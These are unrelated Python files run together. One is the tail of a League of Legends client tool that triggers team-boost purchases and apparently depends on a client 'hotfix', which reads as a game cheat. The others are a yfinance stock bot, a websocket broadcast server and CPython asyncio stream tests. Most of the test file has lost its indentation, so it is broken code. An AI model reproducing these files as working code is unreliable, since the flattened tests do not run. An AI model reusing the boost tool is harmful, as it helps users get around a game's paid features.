        status.configure(text=f"Status: Connecting [{name}]", fg="#ffff19")
        return True
    else: return False
async def boostBAS(cmd) -> None:
    """POST a team-boost purchase and reflect the outcome in the status label."""
    req = await cmd.request("POST", "/lol-champ-select/v1/team-boost/purchase")
    if req.status == 204:
        status.configure(text="Status: Activate Boost", fg="#19ff19")
    elif req.status == 500:
        status.configure(text="Status: Client hotfix is not applied", fg="#ff1919")
    else:
        status.configure(text="Status: You are not in champion pick", fg="#ff1919")
    # Restore the "connecting" status after 2.5 seconds.
    window.after(2500, lambda:status.configure(text=f"Status: Connecting [{name}]", fg="#ffff19"))
def click() -> None:
    # Button callback: flag a boost-purchase request for the connector loop.
    global buttonClick
    buttonClick = True

def closeWindow() -> None:
    # WM_DELETE_WINDOW handler: tear down the Tk window.
    window.destroy()
@client.ready
async def connectLOL(cmd) -> None:
    """Connector main loop: verify the summoner, then poll for boost clicks.

    Runs inside lcu_driver's asyncio event loop once the client is ready.
    """
    global buttonClick
    import asyncio  # local import, only needed for the polling sleep below
    check = await get_name(cmd)
    if check is False:
        messagebox.showerror(title="Dick Error", message="There was a problem restart the program")
        window.destroy()
    while check:
        if buttonClick:
            await boostBAS(cmd)
            buttonClick = False
        # BUG FIX: the original loop spun without awaiting anything, pegging
        # a CPU core and starving the event loop; yield between polls.
        await asyncio.sleep(0.05)
# Build the three widgets: title label, Boost button, status label.
header = tk.Label(window, text="R3nzTheCodeGOD", font=("Arial", 19), bg="#191970", fg="#ff961f")
header.pack(pady=5, padx=5)
button = tk.Button(window, text="Boost", font=("Arial", 12), bg="#ff961f", fg="#191970", bd=5, activebackground="#197019", activeforeground="#000000", width=10, height=2, command=click)
button.pack(pady=5, padx=5)
status = tk.Label(window, text="Status: waiting LOL...", font=("Arial", 10), bg="#191970", fg="#ffff19")
status.pack(pady=5, padx=5)

# Run the LCU connector on a daemon thread so the Tk mainloop stays responsive.
prcs = threading.Thread(target=client.start, daemon=True)
prcs.start()

window.protocol("WM_DELETE_WINDOW", closeWindow)
window.mainloop()
speculbot.py | import yfinance as yf
import requests
from threading import Event, Thread
from yfinance.ticker import Ticker
class BotTicker:
    """Tracks the algorithm's decision history for one stock symbol."""

    def __init__(self, symbol: str):
        self._name = symbol
        # Decision history; starts with a -1 "no decision yet" sentinel.
        self._states = [-1]
        self._result = -1

    def add_state(self, state: int):
        """Record *state* as the latest decision and append it to history."""
        self._result = state
        self._states.append(state)

    @property
    def states(self):
        """Full decision history, oldest first."""
        return self._states

    @property
    def name(self):
        """The ticker symbol this object tracks."""
        return self._name

    @property
    def result(self):
        """Most recent decision."""
        return self._result

    @result.setter
    def result(self, result: int):
        # Overrides the latest decision without touching the history.
        self._result = result
class SpeculBot:
    """Background speculation bot that runs *algo* over Yahoo Finance data.

    Parameters
    ----------
    algo : callable invoked as ``algo(tickers, history, stop_loss=...)``.
    symbols : whitespace-separated ticker symbols, e.g. "AAPL MSFT".
    name : display name of the bot.
    stop_loss : optional per-symbol stop-loss levels; defaults to -3% each.
    """

    def __init__(self, algo, symbols: str, name="SpeculBot", stop_loss=None):
        self.flag = Event()
        # Set stop loss to assigned values.
        # BUG FIX: the original iterated `for _ in len(...)` (TypeError:
        # 'int' object is not iterable) and used a mutable [] default
        # argument; both are corrected here. An empty/omitted stop_loss
        # still yields the -3% default, so callers are unaffected.
        if not stop_loss:
            self.stop_loss_ref = [-0.03 for _ in range(len(symbols.split()))]
        else:
            self.stop_loss_ref = stop_loss
        # API vars
        self.num_API_calls = 0
        self.symbols = symbols
        self.tickers = [BotTicker(s) for s in symbols.upper().split(' ')]
        # Class properties
        self.name = name
        # Algorithm to run
        self.algo = algo
        # Data to be handed over to the StockBoy controller.
        self.latest_df = None
        self._thread = Thread(target=self.run)

    def run(self):
        # Placeholder main loop; wait on the stop flag instead of
        # busy-spinning (the original `continue` loop pegged a core).
        while not self.flag.is_set():
            self.flag.wait(0.1)  # TBD

    def get_results(self):
        """Fetch a year of data, run the algorithm, and return the tickers."""
        history = None
        try:
            history = self.fetch_data(self.symbols)
        except Exception as ex:
            if type(ex) is ValueError:
                print("Yahoo Finance Backed Error, Attempting to Fix")
            elif type(ex) is requests.exceptions.SSLError:
                print("Yahoo Finance Backed Error, Attempting to Fix SSL")
            else:
                print("{err}".format(err=ex))
        self.algo(self.tickers, history, stop_loss=self.stop_loss_ref)
        return self.tickers

    # Could be more specific about exactly which information is fetched.
    def fetch_data(self, symbols):
        """Download one year of daily data for *symbols* (counts API calls)."""
        ticker_data = yf.download(symbols, period="1y", interval="1d")
        self.num_API_calls += 1
        return ticker_data

    def start(self):
        """Start the background thread."""
        self._thread.start()

    def stop(self):
        """Signal the background thread to exit."""
        self.flag.set()

    def is_alive(self):
        return self._thread.is_alive()

    def join(self):
        self._thread.join()

    # NOTE(review): the two methods below are shadowed by the instance
    # attributes of the same name assigned in __init__ and are therefore
    # unreachable; kept only to preserve the class's visible interface.
    def name(self):
        return self.name

    def symbols(self):
        return self.symbols
|
web_socket_server.py | ## Author: Victor Dibia
## Web socket server. Used to send socket messages to a connected clients.
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from threading import Thread
import time
retry_threshold = 5
socket_url = "127.0.0.1"
socket_port = 5006
clients = []
class SockerServer(WebSocket):
    """WebSocket handler that broadcasts every message to all clients."""

    def handleMessage(self):
        # Relay the received payload to every connected client.
        for client in clients:
            client.sendMessage(self.data)

    def handleConnected(self):
        print(" > New client connected ",self.address, 'connected')
        # Announce the newcomer to existing clients before registering it,
        # so the new client does not receive its own announcement.
        for client in clients:
            client.sendMessage(' - connected')
        clients.append(self)

    def handleClose(self):
        # Deregister first so the departing client gets no notification.
        clients.remove(self)
        print(self.address, 'closed')
        for client in clients:
            client.sendMessage(self.address[0] + u' - disconnected')
# def sendMessage():
# print("sending message to ", len(clients), " clients")
# for client in clients:
# client.sendMessage("bingo")
def spinup_server():
    # Blocking call: serve websocket connections on the module-level port.
    print("Starting websocket server")
    server = SimpleWebSocketServer('', socket_port, SockerServer)
    server.serveforever()
def init(s_port):
    """Start the websocket server on *s_port* in a background thread.

    Sleeps briefly so the server is up before the caller proceeds.
    """
    # BUG FIX: without the global declaration the assignment created a
    # function-local variable, so spinup_server always bound the default
    # port (5006) regardless of the argument.
    global socket_port
    socket_port = s_port
    thread = Thread(target=spinup_server)
    thread.start()
    # thread.join()
    time.sleep(4)
    print("Number of connected clients", len(clients))
|
test_streams.py | """Tests for streams.py."""
import gc
import os
import queue
import pickle
import socket
import sys
import threading
import unittest
from unittest import mock
from test.support import socket_helper
try:
import ssl
except ImportError:
ssl = None
import asyncio
from test.test_asyncio import utils as test_utils
def tearDownModule():
    # Reset the global event loop policy that the tests may have replaced.
    asyncio.set_event_loop_policy(None)
class StreamTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
stream = asyncio.StreamReader()
self.assertIs(stream._loop, m_events.get_event_loop.return_value)
def _basetest_open_connection(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
def test_open_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address)
self._basetest_open_connection(conn_fut)
@socket_helper.skip_unless_bind_unix_socket
def test_open_unix_connection(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address)
self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
try:
reader, writer = self.loop.run_until_complete(open_connection_fut)
finally:
asyncio.set_event_loop(None)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_connection(
*httpd.address,
ssl=test_utils.dummy_ssl_context())
self._basetest_open_connection_no_loop_ssl(conn_fut)
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_unix_connection_no_loop_ssl(self):
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_unix_connection(
httpd.address,
ssl=test_utils.dummy_ssl_context(),
server_hostname='',
)
self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer._protocol.connection_lost(ZeroDivisionError())
f = reader.read()
with self.assertRaises(ZeroDivisionError):
self.loop.run_until_complete(f)
writer.close()
test_utils.run_briefly(self.loop)
self.assertEqual(messages, [])
def test_open_connection_error(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address)
self._basetest_open_connection_error(conn_fut)
@socket_helper.skip_unless_bind_unix_socket
def test_open_unix_connection_error(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address)
self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'')
self.assertEqual(b'', stream._buffer)
def test_feed_nonempty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.assertEqual(self.DATA, stream._buffer)
def test_read_zero(self):
# Read zero bytes.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.read(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
def test_read(self):
# Read bytes.
stream = asyncio.StreamReader(loop=self.loop)
read_task = self.loop.create_task(stream.read(30))
def cb():
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA, data)
self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
# Read bytes without line breaks.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line1')
stream.feed_data(b'line2')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'line1', data)
self.assertEqual(b'line2', stream._buffer)
def test_read_eof(self):
# Read bytes, stop at eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = self.loop.create_task(stream.read(1024))
def cb():
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'', data)
self.assertEqual(b'', stream._buffer)
def test_read_until_eof(self):
# Read all bytes until eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = self.loop.create_task(stream.read(-1))
def cb():
stream.feed_data(b'chunk1\n')
stream.feed_data(b'chunk2')
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1\nchunk2', data)
self.assertEqual(b'', stream._buffer)
def test_read_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.read(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.read(2))
def test_invalid_limit(self):
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.StreamReader(limit=0, loop=self.loop)
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.StreamReader(limit=-1, loop=self.loop)
def test_read_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readline(self):
# Read one line. 'readline' will need to wait for the data
# to come from 'cb'
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'chunk1 ')
read_task = self.loop.create_task(stream.readline())
def cb():
stream.feed_data(b'chunk2 ')
stream.feed_data(b'chunk3 ')
stream.feed_data(b'\n chunk4')
self.loop.call_soon(cb)
line = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
# Read one line. The data is in StreamReader's buffer
# before the event loop is run.
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1\nline2\n')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer should contain the remaining data after exception
self.assertEqual(b'line2\n', stream._buffer)
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1')
stream.feed_data(b'li')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# No b'\n' at the end. The 'limit' is set to 3. So before
# waiting for the new data in buffer, 'readline' will consume
# the entire buffer, and since the length of the consumed data
# is more than 3, it will raise a ValueError. The buffer is
# expected to be empty now.
self.assertEqual(b'', stream._buffer)
def test_at_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
self.assertFalse(stream.at_eof())
self.loop.run_until_complete(stream.readline())
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
stream.feed_eof()
self.loop.run_until_complete(stream.readline())
self.assertTrue(stream.at_eof())
def test_readline_limit(self):
# Read one line. StreamReaders are fed with data after
# their 'readline' methods are called.
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer had just one line of data, and after raising
# a ValueError it should be empty.
self.assertEqual(b'', stream._buffer)
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2\n')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'chunk3\n', stream._buffer)
# check strictness of the limit
stream = asyncio.StreamReader(limit=7, loop=self.loop)
stream.feed_data(b'1234567\n')
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'1234567\n', line)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678\n')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readline_nolimit_nowait(self):
# All needed data for the first 'readline' call will be
# in the buffer.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA[:6])
stream.feed_data(self.DATA[6:])
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line1\n', line)
self.assertEqual(b'line2\nline3\n', stream._buffer)
def test_readline_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'some data')
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'some data', line)
def test_readline_empty_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', line)
def test_readline_read_byte_count(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.loop.run_until_complete(stream.readline())
data = self.loop.run_until_complete(stream.read(7))
self.assertEqual(b'line2\nl', data)
self.assertEqual(b'ine3\n', stream._buffer)
def test_readline_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line\n', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readuntil_separator(self):
stream = asyncio.StreamReader(loop=self.loop)
with self.assertRaisesRegex(ValueError, 'Separator should be'):
self.loop.run_until_complete(stream.readuntil(separator=b''))
def test_readuntil_multi_chunks(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAAxxx')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'xxx', stream._buffer)
def test_readuntil_multi_chunks_1(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYaa')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYa')
stream.feed_data(b'aa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'aaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'aaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'Xaaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'Xaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'XXX')
stream.feed_data(b'a')
stream.feed_data(b'a')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'XXXaaa', data)
self.assertEqual(b'', stream._buffer)
def test_readuntil_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'some dataAA')
stream.feed_eof()
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(cm.exception.partial, b'some dataAA')
self.assertIsNone(cm.exception.expected)
self.assertEqual(b'', stream._buffer)
def test_readuntil_limit_found_sep(self):
stream = asyncio.StreamReader(loop=self.loop, limit=3)
stream.feed_data(b'some dataAA')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'not found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAA', stream._buffer)
stream.feed_data(b'A')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'is found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAAA', stream._buffer)
def test_readexactly_zero_or_less(self):
# Read exact number of bytes (zero or less).
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.readexactly(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
with self.assertRaisesRegex(ValueError, 'less than zero'):
self.loop.run_until_complete(stream.readexactly(-1))
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly(self):
# Read exact number of bytes.
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = self.loop.create_task(stream.readexactly(n))
def cb():
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA + self.DATA, data)
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.readexactly(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readexactly_eof(self):
# Read exact number of bytes (eof).
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = self.loop.create_task(stream.readexactly(n))
def cb():
stream.feed_data(self.DATA)
stream.feed_eof()
self.loop.call_soon(cb)
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(read_task)
self.assertEqual(cm.exception.partial, self.DATA)
self.assertEqual(cm.exception.expected, n)
self.assertEqual(str(cm.exception),
'18 bytes read on a total of 36 expected bytes')
self.assertEqual(b'', stream._buffer)
def test_readexactly_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readexactly(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertIsNone(stream.exception())
exc = ValueError()
stream.set_exception(exc)
self.assertIs(stream.exception(), exc)
def test_exception_waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
async def set_err():
stream.set_exception(ValueError())
t1 = self.loop.create_task(stream.readline())
t2 = self.loop.create_task(set_err())
self.loop.run_until_complete(asyncio.wait([t1, t2]))
self.assertRaises(ValueError, t1.result)
def test_exception_cancel(self):
stream = asyncio.StreamReader(loop=self.loop)
t = self.loop.create_task(stream.readline())
test_utils.run_briefly(self.loop)
t.cancel()
test_utils.run_briefly(self.loop)
# The following line fails if set_exception() isn't careful.
stream.set_exception(RuntimeError('message'))
test_utils.run_briefly(self.loop)
self.assertIs(stream._waiter, None)
def test_start_server(self):
    """End-to-end test of asyncio.start_server() with both handler styles.

    Runs a one-line echo server twice — once with a coroutine client
    handler, once with a plain-callback handler that schedules the
    coroutine itself — and asserts the round-tripped line both times.
    """

    class MyServer:
        # Minimal line-echo server wrapper around asyncio.start_server().

        def __init__(self, loop):
            self.server = None
            self.loop = loop

        async def handle_client(self, client_reader, client_writer):
            # Echo exactly one line back, then close the connection.
            data = await client_reader.readline()
            client_writer.write(data)
            await client_writer.drain()
            client_writer.close()
            await client_writer.wait_closed()

        def start(self):
            # Bind to an ephemeral port and hand the ready socket to
            # start_server() via sock=.
            sock = socket.create_server(('127.0.0.1', 0))
            self.server = self.loop.run_until_complete(
                asyncio.start_server(self.handle_client,
                                     sock=sock))
            return sock.getsockname()

        def handle_client_callback(self, client_reader, client_writer):
            # Callback-style handler: must schedule the coroutine manually.
            self.loop.create_task(self.handle_client(client_reader,
                                                     client_writer))

        def start_callback(self):
            # Probe for a free port, close the probe socket, then reuse
            # the address via host/port arguments instead of sock=.
            sock = socket.create_server(('127.0.0.1', 0))
            addr = sock.getsockname()
            sock.close()
            self.server = self.loop.run_until_complete(
                asyncio.start_server(self.handle_client_callback,
                                     host=addr[0], port=addr[1]))
            return addr

        def stop(self):
            if self.server is not None:
                self.server.close()
                self.loop.run_until_complete(self.server.wait_closed())
                self.server = None

    async def client(addr):
        reader, writer = await asyncio.open_connection(*addr)
        # send a line
        writer.write(b"hello world!\n")
        # read it back
        msgback = await reader.readline()
        writer.close()
        await writer.wait_closed()
        return msgback

    messages = []
    self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))

    # test the server variant with a coroutine as client handler
    server = MyServer(self.loop)
    addr = server.start()
    msg = self.loop.run_until_complete(self.loop.create_task(client(addr)))
    server.stop()
    self.assertEqual(msg, b"hello world!\n")

    # test the server variant with a callback as client handler
    server = MyServer(self.loop)
    addr = server.start_callback()
    msg = self.loop.run_until_complete(self.loop.create_task(client(addr)))
    server.stop()
    self.assertEqual(msg, b"hello world!\n")

    # Nothing should have reached the loop's exception handler.
    self.assertEqual(messages, [])
@socket_helper.skip_unless_bind_unix_socket
def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(path):
reader, writer = await asyncio.open_unix_connection(path)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start()
msg = self.loop.run_until_complete(
self.loop.create_task(client(path)))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start_callback()
msg = self.loop.run_until_complete(
self.loop.create_task(client(path)))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
    # See asyncio issue 168. This test is derived from the example
    # subprocess_attach_read_pipe.py, but we configure the
    # StreamReader's limit so that twice it is less than the size
    # of the data written. Also we must explicitly attach a child
    # watcher to the event loop.

    # Child writes 4 bytes to the inherited fd and exits.
    code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
    rfd, wfd = os.pipe()
    args = [sys.executable, '-c', code, str(wfd)]

    # Attach the read end of the pipe to a StreamReader whose limit (1)
    # is far smaller than the payload, exercising feed/pause cycles.
    pipe = open(rfd, 'rb', 0)
    reader = asyncio.StreamReader(loop=self.loop, limit=1)
    protocol = asyncio.StreamReaderProtocol(reader, loop=self.loop)
    transport, _ = self.loop.run_until_complete(
        self.loop.connect_read_pipe(lambda: protocol, pipe))

    # NOTE(review): SafeChildWatcher / set_child_watcher are deprecated
    # as of Python 3.12 — confirm the target interpreter version before
    # modernizing this block.
    watcher = asyncio.SafeChildWatcher()
    watcher.attach_loop(self.loop)
    try:
        asyncio.set_child_watcher(watcher)
        create = asyncio.create_subprocess_exec(
            *args,
            pass_fds={wfd},
        )
        proc = self.loop.run_until_complete(create)
        self.loop.run_until_complete(proc.wait())
    finally:
        asyncio.set_child_watcher(None)

    # Close our copy of the write end so the reader can reach EOF.
    os.close(wfd)
    data = self.loop.run_until_complete(reader.read(-1))
    self.assertEqual(data, b'data')
def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.StreamReader()
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = mock.Mock()
protocol = asyncio.StreamReaderProtocol(reader)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises(self):
    # See http://bugs.python.org/issue25441
    # This test should not use asyncio for the mock server; the
    # whole point of the test is to test for a bug in drain()
    # where it never gives up the event loop but the socket is
    # closed on the server side.

    messages = []
    self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
    q = queue.Queue()

    def server():
        # Runs in a separate thread.
        with socket.create_server(('localhost', 0)) as sock:
            addr = sock.getsockname()
            q.put(addr)
            clt, _ = sock.accept()
            clt.close()

    async def client(host, port):
        reader, writer = await asyncio.open_connection(host, port)
        while True:
            writer.write(b"foo\n")
            await writer.drain()

    # Start the server thread and wait for it to be listening.
    thread = threading.Thread(target=server)
    # Thread.setDaemon() is deprecated since Python 3.10; assign the
    # daemon attribute directly instead.
    thread.daemon = True
    thread.start()
    addr = q.get()

    # Should not be stuck in an infinite loop.
    with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
                            BrokenPipeError)):
        self.loop.run_until_complete(client(*addr))

    # Clean up the thread. (Only on success; on failure, it may
    # be stuck in accept().)
    thread.join()
    self.assertEqual([], messages)
def test___repr__(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.StreamReader(loop=self.loop, limit=123)
self.assertEqual("<StreamReader limit=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
self.assertEqual("<StreamReader eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'data')
self.assertEqual("<StreamReader 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.StreamReader(loop=self.loop)
exc = RuntimeError()
stream.set_exception(exc)
self.assertEqual("<StreamReader exception=RuntimeError()>",
repr(stream))
def test___repr__waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._waiter = asyncio.Future(loop=self.loop)
self.assertRegex(
repr(stream),
r"<StreamReader waiter=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
